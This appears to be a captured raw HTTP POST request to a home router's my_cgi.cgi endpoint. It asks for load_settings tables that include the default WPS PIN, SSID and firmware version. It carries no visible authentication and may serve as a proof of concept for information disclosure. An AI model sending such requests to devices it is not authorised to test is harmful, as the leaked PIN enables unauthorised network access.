POST /my_cgi.cgi?0.04639149955404065 HTTP/1.1
Host: 192.168.0.1
Content-Length: 201
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://192.168.0.1
Referer: http://192.168.0.1/Protected_Setup.htm
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

request=load_settings&table_name=default_ssid&table_name=wifi_protected_setup&table_name=get_default_wps_pin&table_name=wireless_enable&table_name=disable_wps_enable&table_name=fw_ver&table_name=hw_ver